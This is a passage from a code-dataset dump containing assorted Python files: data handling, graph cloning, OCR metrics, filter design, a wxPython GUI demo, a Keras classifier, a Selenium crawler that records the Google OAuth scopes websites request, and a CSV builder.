\"dataset_URM_validation\")\r\n\r\n dataIO.save_data(data_dict_to_save = self.URM_test_av,\r\n file_name = \"dataset_URM_test\")\r\n\r\n # dataIO.save_data(data_dict_to_save = self.AVAILABLE_ICM,\r\n # file_name = \"dataset_ICM\")\r\n\r\n \r\n\r\n def load_data(self, save_folder_path):\r\n\r\n dataIO = DataIO(folder_path = save_folder_path)\r\n\r\n global_attributes_dict = dataIO.load_data(file_name = \"dataset_global_attributes\")\r\n\r\n for attrib_name, attrib_object in global_attributes_dict.items():\r\n self.__setattr__(attrib_name, attrib_object)\r\n\r\n self.URM_train_av = dataIO.load_data(file_name = \"dataset_URM_train\")\r\n \r\n self.URM_validation_av = dataIO.load_data(file_name = \"dataset_URM_validation\")\r\n\r\n self.URM_test_av = dataIO.load_data(file_name = \"dataset_URM_test\")\r\n \r\n # self.AVAILABLE_ICM = dataIO.load_data(file_name = \"dataset_ICM\")\r\n \r\n","sub_path":"Data_manager/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"186479827","text":"class Node(object):\n def __init__(self, val, neighbors):\n self.val = val\n self.neighbors = neighbors\n\nclass Solutions(object):\n def cloneGraph(self, node):\n d = dict()\n q = [node]\n d[node] = Node(node.val, [])\n while q:\n n = q.pop(0)\n newnode = d[n]\n for x in n.neighbors:\n if d.get(x):\n newnode.neighbors.append(d.get(x))\n else:\n d[x] = Node(x.val, [])\n newnode.neighbors.append(d[x])\n q.append(x)\n return d[node]\n # DFS\n def cloneGraph2(self, node):\n d = dict()\n stack = [node]\n d[node] = Node(node.val, [])\n while stack:\n curr = stack.pop()\n n = d[curr]\n for x in curr.neighbors:\n if d.get(x):\n n.neighbors.append(d[x])\n else:\n d[x] = Node(x.val, [])\n stack.append(x)\n n.neighbors.append(d[x])\n return d[node]\n\n # 记忆化递归\n def cloneGraph3(self, node):\n if node is None:\n return None\n \n # 题目中说val在1到100之间\n memo = [None] * 101\n\n # 返回值为当前节点的复制\n def draw(node):\n if memo[node.val]:\n return memo[node.val]\n \n res = Node(node.val, [])\n memo[node.val] = res\n for nei in node.neighbors:\n res.neighbors.append(draw(nei))\n return res\n \n return draw(node)\n\n","sub_path":"133_CloneGraph.py","file_name":"133_CloneGraph.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"189945499","text":"import string\r\nimport editdistance\r\nimport numpy as np\r\nfrom data_provider.data_utils import get_vocabulary\r\nimport editdistance\r\n\r\ndef _normalize_text(text):\r\n text = ''.join(filter(lambda x: x in (string.digits + string.ascii_letters), text))\r\n return text.lower()\r\n\r\ndef idx2label(inputs, id2char=None, char2id=None):\r\n\r\n if id2char is None:\r\n voc, char2id, id2char = get_vocabulary(voc_type=\"ALLCASES_SYMBOLS\")\r\n\r\n def end_cut(ins):\r\n cut_ins = []\r\n for id in ins:\r\n if id != char2id['EOS']:\r\n if id != char2id['UNK']:\r\n cut_ins.append(id2char[id])\r\n else:\r\n break\r\n return cut_ins\r\n\r\n if isinstance(inputs, np.ndarray):\r\n assert len(inputs.shape) == 2, \"input's rank should be 2\"\r\n results = [''.join([ch for ch in end_cut(ins)]) for ins in inputs]\r\n return results\r\n else:\r\n print(\"input to idx2label should be numpy array\")\r\n return inputs\r\n\r\ndef calc_metrics(predicts, labels, metrics_type='accuracy'):\r\n assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n predicts = [_normalize_text(pred) for pred in predicts]\r\n labels = [_normalize_text(targ) for targ in labels]\r\n if metrics_type == 'accuracy':\r\n acc_list = [(pred == tar) for pred, tar in zip(predicts, labels)]\r\n accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n return accuracy\r\n elif metrics_type == 'editdistance':\r\n ed_list = [editdistance.eval(pred, targ) for pred, targ in zip(predicts, labels)]\r\n eds = sum(ed_list)\r\n return eds\r\n\r\n return -1\r\n\r\ndef calc_metrics_length(predicts, labels, metrics_type='accuracy'):\r\n assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n predicts = [_normalize_text(pred) for pred in predicts]\r\n labels = [_normalize_text(targ) for targ in labels]\r\n lenghts = [len(la) for la in labels]\r\n\r\n predicts_ = np.array(predicts)\r\n labels_ = np.array(labels)\r\n lenghts_ = np.array(lenghts)\r\n\r\n len_acc = {}\r\n for l in range(lenghts_.min(), lenghts_.max()):\r\n group_predicts = predicts_[lenghts_==l].tolist()\r\n group_labels = labels_[lenghts_==l].tolist()\r\n assert len(group_predicts) == len(group_labels)\r\n if len(group_predicts) == 0:\r\n continue\r\n acc_list = [(pred == tar) for pred, tar in zip(group_predicts, group_labels)]\r\n # accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n len_acc[l] = (sum(acc_list), len(acc_list))\r\n\r\n return len_acc\r\n\r\ndef _lexicon_search(lexicon, word):\r\n edit_distances = []\r\n lexicon = [_normalize_text(lex) for lex in lexicon]\r\n for lex_word in lexicon:\r\n edit_distances.append(editdistance.eval(_normalize_text(lex_word), _normalize_text(word)))\r\n edit_distances = np.asarray(edit_distances, dtype=np.int)\r\n argmin = np.argmin(edit_distances)\r\n return lexicon[argmin]\r\n\r\ndef calc_metrics_lexicon(predicts, labels, lexicons, metrics_type='accuracy'):\r\n assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n predicts = [_normalize_text(pred) for pred in predicts]\r\n labels = [_normalize_text(targ) for targ in labels]\r\n refine_predicts = [_lexicon_search(l, p) for l, p in zip(lexicons, predicts)]\r\n\r\n if metrics_type == 'accuracy':\r\n acc_list = [(pred == tar) for pred, tar in zip(refine_predicts, labels)]\r\n accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n return accuracy\r\n elif metrics_type == 'editdistance':\r\n ed_list = [editdistance.eval(pred, targ) for pred, targ in zip(refine_predicts, labels)]\r\n eds = sum(ed_list)\r\n return eds","sub_path":"utils/transcription_utils.py","file_name":"transcription_utils.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"495846093","text":"import numpy as np\nfrom scipy import signal\nfrom argparse import ArgumentParser\np = ArgumentParser()\np.add_argument('dt',type=float)\na = p.parse_args()\n\nprint('switch(Hz)\\n{')\n\nfrequencies = 50. * np.array(2**np.arange(9))\nfor freq in frequencies:\n\tsos = signal.butter(2,freq,btype='high',output='sos',fs=1./a.dt)\n\tprint('\\tcase %d:' % freq)\n\tfor c,v in zip(['b0','b1','b2','a0','a1','a2'],sos[0]):\n\t\tif c == 'a0':\n\t\t\tcontinue\n\t\tprint('\\t\\t%s = %.15f;' % (c,v))\n\tprint('\\t\\tbreak;')\nprint('}')\n\n\n\n","sub_path":"tools/hpf2polecoeffs.py","file_name":"hpf2polecoeffs.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262143820","text":"# Name : TEST语言编译器\r\n# Time : 2018.11.20 ~ 2018.\r\n# Developer : wngg\r\n# Coding : utf-8\r\n\r\n\r\n# --------------------CLASS-------------------- #\r\n\r\n#语法分析器\r\n#作用:进行语法分析\r\n#输入:文件路径\r\nclass GrammaticalAnalysis :\r\n\r\n\tdef __init__(self,inPath) :\r\n\r\n\t\tself.outPath = inPath[:inPath.rfind(\"\\\\\") + 1] + \"Grammatical_out.txt\"\t\t#输出结果文件路径\r\n\t\tself.inFile = open(inPath,\"r\")\t\t\t\t\t\t\t\t\t\t\t\t#打开输入文件\r\n\t\tself.outFile = open(self.outPath,\"w\")\t\t\t\t\t\t\t\t\t\t#打开输出文件","sub_path":"grammaticalAnalysis.py","file_name":"grammaticalAnalysis.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370268889","text":"#!/usr/bin/env python\n\n\"\"\"\nExample of the very basic, minimal framework for a wxPython application\n\nThis one adds another sizer to fix the layout -- and the WIT!\n\"\"\"\n\n\nimport wx\n\n#---------------------------------------------------------------------------\n\n# This is how you pre-establish a file filter so that file dialogs\n# only show the extension(s) you want it to.\nwildcard = \"Python source (*.py)|*.py|\" \\\n \"Compiled Python (*.pyc)|*.pyc|\" \\\n \"SPAM files (*.spam)|*.spam|\" \\\n \"Egg file (*.egg)|*.egg|\" \\\n \"All files (*.*)|*.*\"\n\n#---------------------------------------------------------------------------\n\nclass AppLogic(object):\n \"\"\"\n A class to hold the application Application Logic.\n\n You generally don't want the real logic of the app mixed\n in with the GUI\n\n In a real app, this would be a substantial collection of \n modules, classes, etc...\n \"\"\"\n def file_open(self, filename=\"default_name\"):\n \"\"\"This method opens a file\"\"\"\n print(\"Open a file: \")\n print(\"I'd be opening file: %s now\"%filename)\n\n def file_close(self):\n \"\"\"This method closes a file\"\"\"\n print(\"Close a file: \")\n print(\"I'd be closing a file now\")\n\n\nclass ButtonPanel(wx.Panel):\n def __init__(self, *args, **kwargs):\n wx.Panel.__init__(self, *args, **kwargs)\n\n ## add a button:\n theButton1 = wx.Button(self, label=\"Push Me\")\n theButton1.Bind(wx.EVT_BUTTON, self.onButton)\n\n ## add another button:\n theButton2 = wx.Button(self, label=\"Push Me Also\")\n theButton2.Bind(wx.EVT_BUTTON, self.onButton)\n\n ## do the layout\n buttonSizer = wx.BoxSizer(wx.VERTICAL)\n \n buttonSizer.Add((1,1), 1) # stretchable space\n buttonSizer.Add(theButton1, 0, wx.GROW | wx.ALL, 4)\n buttonSizer.Add(theButton2, 0, wx.GROW | wx.ALL, 4)\n buttonSizer.Add((1,1), 3) # stretchable space\n\n ## need another sizer to get the horizonal placement right:\n mainSizer = wx.BoxSizer(wx.HORIZONTAL)\n mainSizer.Add((1,1), 1) # stretchable space\n mainSizer.Add(buttonSizer, 0, wx.GROW) # the sizer with the buttons in it\n mainSizer.Add((1,1), 1) # stretchable space\n\n self.SetSizer(mainSizer)\n \n def onButton(self, evt=None):\n print(\"You pushed one of the buttons!\")\n\n\nclass TestFrame(wx.Frame):\n def __init__(self, app_logic, *args, **kwargs):\n kwargs.setdefault('title', \"Simple test App\")\n wx.Frame.__init__(self, *args, **kwargs)\n\n self.app_logic = app_logic\n\n # put the Panel on the frame\n self.buttonPanel = ButtonPanel(self)\n\n # Build up the menu bar:\n menuBar = wx.MenuBar()\n \n fileMenu = wx.Menu()\n openMenuItem = fileMenu.Append(wx.ID_ANY, \"&Open\", \"Open a file\" )\n self.Bind(wx.EVT_MENU, self.onOpen, openMenuItem)\n\n closeMenuItem = fileMenu.Append(wx.ID_ANY, \"&Close\", \"Close a file\" )\n self.Bind(wx.EVT_MENU, self.onClose, closeMenuItem)\n\n exitMenuItem = fileMenu.Append(wx.ID_EXIT, \"Exit\", \"Exit the application\")\n self.Bind(wx.EVT_MENU, self.onExit, exitMenuItem)\n menuBar.Append(fileMenu, \"&File\")\n \n helpMenu = wx.Menu()\n helpMenuItem = helpMenu.Append(wx.ID_HELP, \"Help\", \"Get help\")\n menuBar.Append(helpMenu, \"&Help\")\n\n self.SetMenuBar(menuBar)\n \n def onOpen(self, evt=None):\n \"\"\"This method opens an existing file\"\"\"\n print(\"Open a file: \")\n # Create the dialog. In this case the current directory is forced as the starting\n # directory for the dialog, and no default file name is forced. This can easily\n # be changed in your program. This is an 'open' dialog, and allows multiple\n # file selections as well.\n #\n # Finally, if the directory is changed in the process of getting files, this\n # dialog is set up to change the current working directory to the path chosen.\n dlg = wx.FileDialog(\n self, message=\"Choose a file\",\n defaultDir=os.getcwd(), \n defaultFile=\"\",\n wildcard=wildcard,\n style=wx.OPEN | wx.CHANGE_DIR\n )\n\n # Show the dialog and retrieve the user response. If it is the OK response, \n # process the data.\n if dlg.ShowModal() == wx.ID_OK:\n # This returns a Python list of files that were selected.\n path = dlg.GetPath()\n print(\"I'd be opening file in onOpen \", path)\n self.app_logic.file_open( path )\n else :\n print(\"The file dialog was canceled before anything was selected\")\n\n # Destroy the dialog. Don't do this until you are done with it!\n # BAD things can happen otherwise!\n dlg.Destroy()\n\n def onClose(self, evt=None):\n print(\"close menu selected\")\n self.app_logic.file_close()\n\n def onExit(self, evt=None):\n print(\"Exit the program here\")\n print(\"The event passed to onExit is type \", type(evt), end=' ')\n self.Close()\n\n\nclass TestApp(wx.App):\n def OnInit(self):\n \"\"\"\n App initilization goes here -- not much to do, in this case\n \"\"\"\n app_logic = AppLogic()\n f = TestFrame(app_logic, parent=None)\n f.Show()\n\n return True\n\nif __name__ == \"__main__\":\n\n app = TestApp(False)\n ## set up the WIT -- to help debug sizers\n import wx.lib.inspection\n wx.lib.inspection.InspectionTool().Show()\n app.MainLoop()\n\n","sub_path":"Examples/wxpython/basic_app_7.py","file_name":"basic_app_7.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103788606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 22 10:10:03 2020\n\n@author: Saad\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nbankdata2 = pd.read_csv(\"trainingCommonVoicePreProcessedWithAgeGroupsRemovingOther.csv\")\n\nX = bankdata2.iloc[:, :-4].values\ny = bankdata2.iloc[:, [34,36,37]].values\n\n\n# # Encoding the Dependent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_y0 = LabelEncoder()\nlabelencoder_y1 = LabelEncoder()\nlabelencoder_y2 = LabelEncoder()\ny[:,0] = labelencoder_y0.fit_transform(y[:,0])\ny[:,1] = labelencoder_y1.fit_transform(y[:,1])\ny[:,2] = labelencoder_y2.fit_transform(y[:,2])\ny = y.astype(float)\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n# Initialising the ANN\nclassifier = Sequential()\n\n# Adding the input layer and the first hidden layer\nclassifier.add(Dense(units = 18, kernel_initializer = 'uniform', activation = 'relu', input_dim = 34))\n# classifier.add(Dropout(p = 0.1))\n\n# Adding the second hidden layer\nclassifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))\n# classifier.add(Dropout(p = 0.1))\n\n# Adding the output layer\nclassifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))\n\n# Compiling the ANN\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Fitting the ANN to the Training set\nclassifier.fit(X_train, y_train[:,0], batch_size = 10, epochs = 50)\n\n\n\nimport numpy \n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred =numpy.multiply(y_pred>0.5, 1) \n\n\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test[:,0], y_pred)\n\nfrom sklearn.metrics import accuracy_score, classification_report\nprint(cm)\nprint(classification_report(y_test[:,0],y_pred))\nprint(\"accuracy:\",accuracy_score(y_test[:,0],y_pred,normalize=True))\n\n\n# Tuning the ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_classifier(optimizer):\n classifier = Sequential()\n classifier.add(Dense(units = 18, kernel_initializer = 'uniform', activation = 'relu', input_dim = 34))\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))\n classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))\n classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics = ['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [50, 60],\n 'optimizer': ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 10)\ngrid_search = grid_search.fit(X_train, y_train[:,0])\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_","sub_path":"Ann.py","file_name":"Ann.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287661735","text":"'''\nCreated by gluthier on 29/12/2015\n'''\n\nimport json\nimport re\nimport time\nimport sys\nimport advanced_crawler as ac\nimport selenium.webdriver as webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nscopes = {\n\t'drive[^.]': 'https://www.googleapis.com/auth/drive',\n\t'drive.readonly': 'https://www.googleapis.com/auth/drive.readonly',\n\t'drive.appfolder': 'https://www.googleapis.com/auth/drive.appfolder',\n\t'drive.apps.readonly': 'https://www.googleapis.com/auth/drive.apps.readonly',\n\t'drive.file': 'https://www.googleapis.com/auth/drive.file',\n\t'drive.install': 'https://www.googleapis.com/auth/drive.install',\n\t'drive.metadata[^.]': 'https://www.googleapis.com/auth/drive.metadata',\n\t'drive.metadata.readonly': 'https://www.googleapis.com/auth/drive.metadata.readonly',\n\t'drive.photos.readonly': 'https://www.googleapis.com/auth/drive.photos.readonly',\n\t'drive.scripts': 'https://www.googleapis.com/auth/drive.scripts',\n\t'drive.appdata': 'https://www.googleapis.com/auth/drive.appdata',\n\t'userinfo.email': 'https://www.googleapis.com/auth/userinfo.email',\n\t'userinfo.profile': 'https://www.googleapis.com/auth/userinfo.profile',\n\t'plus.login': 'https://www.googleapis.com/auth/plus.login',\n\t'plus.me': 'https://www.googleapis.com/auth/plus.me',\n\t'plus.profiles.read': 'https://www.googleapis.com/auth/plus.profiles.read',\n\t'calendar[^.]': 'https://www.googleapis.com/auth/calendar',\n\t'calendar.readonly': 'https://www.googleapis.com/auth/calendar.readonly'\n}\n\ncandidates = ['drive', 'google', 'oauth', 'authorize', 'sign', 'login', 'load', 'open', 'account', 'select', 'start', 'log']\n\ndef retrievePermissions(url):\n\tfound = False\n\ttry:\n\t\tfor s in scopes:\n\t\t\t# for each scope, we build a regex to find it in a URL\n\t\t\tp = re.compile('https(?:%3A|:)(?:%2F|/){2}www.googleapis.com(?:%2F|/)auth(?:%2F|/)('+s+')')\n\t\t\tif p.search(url):\n\t\t\t\tfound = True\n\t\t\t\tprint(\" \" + scopes[s])\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef closeEventualAlert():\n\ttry:\n\t\t# wait for an eventual alert to close it\n\t\tWebDriverWait(driver, 1).until(EC.alert_is_present())\n\t\talert = driver.switch_to_alert()\n\t\talert.accept()\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef clickElement(elem):\n\tfound = False\n\t# remember where we are in case the click opens a new page\n\tmain_window = driver.current_window_handle\n\tmain_window_url = driver.current_url\n\ttry:\n\t\tif elem.is_displayed():\n\t\t\telem.click()\n\t\t\tcloseEventualAlert()\n\t\t\t# each window opened has an handle to acces it\n\t\t\tfor handle in driver.window_handles:\n\t\t\t\t# to retrieve an URL, we have to go to the page to get it\n\t\t\t\tdriver.switch_to.window(handle)\n\t\t\t\tcurrent_url = driver.current_url\n\t\t\t\tfound = retrievePermissions(current_url)\n\t\t\t\tif current_url != main_window_url:\n\t\t\t\t\t# if it went to another page, we go back\n\t\t\t\t\turl = driver.current_url\n\t\t\t\t\tdriver.back()\n\t\t\t\t\tcloseEventualAlert()\n\t\t\t\tif handle != main_window:\n\t\t\t\t\t# if it opened another window, we close it\n\t\t\t\t\tdriver.close()\n\t\t\t\t\tcloseEventualAlert()\n\t\t\t\tdriver.switch_to_window(main_window)\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef searchPermissions(elems):\n\ttry:\n\t\tfor e in elems:\n\t\t\t# candidates contain keywords that might lead to google drive\n\t\t\tfor c in candidates:\n\t\t\t\t# test on the id, title, class or text content of the element\n\t\t\t\tif e and (str(e.get_attribute('id')).lower().find(c) >= 0 or str(e.get_attribute('title')).lower().find(c) >= 0 or str(e.get_attribute('class')).lower().find(c) >= 0 or str(e.text).lower().find(c) >= 0):\n\t\t\t\t\tif clickElement(e):\n\t\t\t\t\t\treturn True\n\t\treturn False\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef findElementsInPage():\n\tfound = False\n\ttry:\n\t\t# start with the buttons on the page\n\t\tbuttons = driver.find_elements_by_xpath('//button')\n\t\tfound = searchPermissions(buttons)\n\t\tif not found:\n\t\t\t# continue with all elements on the page\n\t\t\telems = driver.find_elements_by_xpath('//body//*')\n\t\t\tfound = searchPermissions(elems)\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef crawlPage(url):\n\tfound = False\n\ttry:\n\t\tdriver.get(url) # get the page\n\t\tcloseEventualAlert()\n\t\tfound = retrievePermissions(url) # check if URL is already the one needed\n\t\tif not found:\n\t\t\tfound = findElementsInPage()\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef runScript():\n\ttry:\n\t\tcounter_found = 0\n\t\tcounter_total = 0\n\t\ttime_start = int(time.time())\n\t\twith open('websites.txt', 'r') as json_data:\n\t\t\twebsites = json.load(json_data)\n\t\t\tjson_data.close()\n\t\t\tfor url in websites:\n\t\t\t\tif url:\n\t\t\t\t\tcounter_total = counter_total + 1\n\t\t\t\t\tprint('Crawling: ' + url)\n\t\t\t\t\t# launch the script\n\t\t\t\t\tif crawlPage(url):\n\t\t\t\t\t\tcounter_found = counter_found + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\t# if not found, run the advanced script\n\t\t\t\t\t\tif ac.runAdvancedCrawler(url, driver):\n\t\t\t\t\t\t\tcounter_found = counter_found + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint('...permissions not found')\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\tfinally:\n\t\ttime_end = int(time.time())\n\t\tdiff_sec = time_end - time_start\n\t\tdiff_min = int(diff_sec / 60)\n\t\tprint('Time to run the script: ' + str(diff_sec) + ' sec (~' + str(diff_min) + ' min)')\n\t\tprint('Found: ' + str(counter_found) + ' (over ' + str(counter_total) + ' tested)')\n\t\tdriver.quit()\n\n# Configure the outputs and run the script\nnow = str(int(time.time()))\ndriver = webdriver.Firefox()\n#sys.stdout = open('log/stdout'+now+'.txt', 'w')\nsys.stderr = open('log/stderr'+now+'.txt', 'w')\nrunScript()\n","sub_path":"bachelor project/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"347448925","text":"# -*- coding:utf-8 -*-\n\nimport sys\nimport urllib\n#import urlparse\nimport re\nfrom hmmlearn import hmm\nimport numpy as np\nfrom sklearn.externals import joblib\n#import HTMLParser\nimport nltk\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef fun(x):\n return x\n\nif __name__ == '__main__':\n data = open('../txt/slb.txt',encoding='utf8')\n argsName = set()\n for line in data.readlines():\n if len(line.split('&')) > 1:\n inputs = line.split('&')\n # print(inputs)\n for input in inputs:\n if len(input.split('=')) > 1:\n argsName.add(input.split('=')[0])\n argsName = list(argsName)\n lst = np.zeros((1, len(argsName)))\n print(lst)\n\n Dish = pd.DataFrame(data=lst,columns=argsName)\n # print(Dish.columns)\n\n\n data = open('../txt/slb.txt', encoding='utf8')\n for line in data.readlines():\n if len(line.split('&')) > 1:\n inputs = line.split('&')\n # print(inputs)\n tmpDish = pd.DataFrame(data=lst,columns=argsName)\n for input in inputs:\n if len(input.split('=')) > 1:\n Name = input.split('=')[0]\n Value = input.split('=')[1].replace('\\r\\n', '')\n Value = input.split('=')[1].replace('\\n','')\n if Value== '':\n Value = 0\n tmpDish[Name] = Value\n Dish = Dish.append(tmpDish)\n # print(Dish.head())\n print(Dish.head())\n Dish = Dish.fillna(0)\n Dish = Dish.replace(0.0, 0)\n Dish = Dish.reset_index(drop=True)\n# Dish = Dish.iloc[1:]\n Dish.to_csv('../csv/slb.csv',encoding='utf8')\n\n\n","sub_path":"NewCodeProbe/makeArgsCsv.py","file_name":"makeArgsCsv.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}